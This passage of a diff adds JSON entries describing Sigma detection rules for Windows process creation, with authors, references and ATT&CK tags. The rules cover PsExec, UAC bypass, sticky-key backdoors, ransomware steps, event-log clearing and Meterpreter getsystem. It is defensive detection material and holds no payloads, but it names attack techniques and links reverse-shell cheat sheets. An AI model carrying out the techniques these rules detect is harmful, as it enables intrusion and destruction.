"attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", + "value": "PsExec Tool Execution" + }, + { + "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Legitimate use of one of these tools" + ], + "filename": "proc_creation_win_hacktool_imphashes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" + ], + "tags": "No established tags" + }, + "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "value": "Windows Hacktool Imphash" + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26857" + ] + }, + "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "value": "CVE-2021-26857 Exchange Exploitation" + }, + { + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_defendercheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/matterpreter/DefenderCheck", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "value": "DefenderCheck Usage" + }, + { + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "value": "Suspicious Shells Spawn by Java Utility Keytool" + }, + { + "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", + "meta": { + "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "creation_date": "2020/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "value": "Lazarus Session Highjacker" + }, + { + "description": "Detects multiple suspicious process in a limited timeframe", + "meta": { + "author": "juju4", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_multiple_susp_cli.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-04-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" + ], + "tags": [ + "car.2013-04-002", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", + "value": "Quick Execution of a Series of Suspicious Commands" + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "435e10e4-992a-4281-96f3-38b11106adde", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet" + }, + { + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "value": "UAC Bypass WSReset" + }, + { + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Rare legitimate installation of kernel drivers via sc.exe" + ], + "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "value": "New Kernel Driver Via SC.EXE" + }, + { + "description": "Detects Ryuk ransomware activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_ryuk.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", + "value": "Ryuk Ransomware" + }, + { + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/147", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "value": "DeviceCredentialDeployment Execution" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", + "value": "Office Applications Spawning Wmi Cli Alternate" + }, + { + "description": "Detects manual service execution (start) via system utilities.", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user executes a service for legitimate reasons." + ], + "filename": "proc_creation_win_service_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "value": "Service Execution" + }, + { + "description": "Detects usage of the SysInternals Procdump utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/16", + "falsepositive": [ + "Legitimate use of procdump by a developer or administrator" + ], + "filename": "proc_creation_win_procdump.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "value": "Procdump Usage" + }, + { + "description": "Identifies suspicious mshta.exe commands.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mshta_javascript.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", + "value": "Mshta JavaScript Execution" + }, + { + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ruby_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "value": "Ruby Inline Command Execution" + }, + { + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_reg_open_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "value": "Suspicious Reg Add Open Command" + }, + { + "description": "Detects the execution of a renamed PsExec often used by attackers or malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/05/21", + "falsepositive": [ + "Software that illegaly integrates PsExec in a renamed form", + "Administrators that have renamed PsExec and no one knows why" + ], + "filename": "proc_creation_win_renamed_psexec.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml" + ], + "tags": [ + "car.2013-05-009", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2", + "value": "Renamed PsExec" + }, + { + "description": "Detects suspicious file execution by wscript and cscript", + "meta": { + "author": "Michael Haag", + "creation_date": "2019/01/16", + "falsepositive": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + ], + "filename": "proc_creation_win_susp_script_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "value": "WSF/JSE/JS/VBA/VBE File Execution" + }, + { + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_csc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1094924091256176641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" + ] + }, + "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "value": "Suspicious Parent of Csc.exe" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" + }, + { + "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_reg_defender_exclusion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", + "value": "Registry Defender Exclusions" + }, + { + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/02/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" + ], + "tags": [ + "attack.t1546.008", + "attack.privilege_escalation" + ] + }, + "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "value": "Sticky-Key Backdoor Copy Cmd.exe" + }, + { + "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_evilnum_jul20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "value": "EvilNum Golden Chickens Deployment via OCX Files" + }, + { + "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_schtasks_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "value": "Delete Important Scheduled Task" + }, + { + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2020/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "value": "CrackMapExec PowerShell Obfuscation" + }, + { + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "meta": { + "author": "Trent Liffick", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" + ] + }, + "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "value": "Findstr Launching .lnk File" + }, + { + "description": "Detects when an admin share is mounted using net.exe", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators" + ], + "filename": "proc_creation_win_net_use_admin_share.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", + "value": "Mounted Windows Admin Shares with net.exe" + }, + { + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_delete_systemstatebackup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "value": "Wbadmin Delete Systemstatebackup" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "value": "Zip A Folder With PowerShell For Staging In Temp" + }, + { + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "meta": { + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_eventlog_clear.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" + ] + }, + "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil" + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "meta": { + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_stickykey_like_backdoor.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ] + }, + "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "value": "Sticky Key Like Backdoor Usage" + }, + { + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "meta": { + "author": "Sreeman", + "creation_date": "2021/06/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "value": "Write Protect For Storage Disabled" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" + ], + "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "15619216-e993-4721-b590-4c520615a67d", + "value": "Meterpreter or Cobalt Strike Getsystem Service Start" + }, + { + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "value": "Suspicious Certreq Command to Download" + }, + { + "description": "Detects a windows service to be stopped", + "meta": { + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/23", + "falsepositive": [ + "Administrator shutting down the service due to upgrade or removal purposes" + ], + "filename": "proc_creation_win_service_stop.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", + "value": "Stop Windows Service" + }, + { + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_browsercore.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mariuszbit/status/1531631015139102720", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" + ], + "tags": [ + "attack.t1528", + "attack.t1036.003" + ] + }, + "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "value": "Process Creation with Renamed BrowserCore.exe" + }, + { + "description": "Adversaries may attempt to get a listing of network 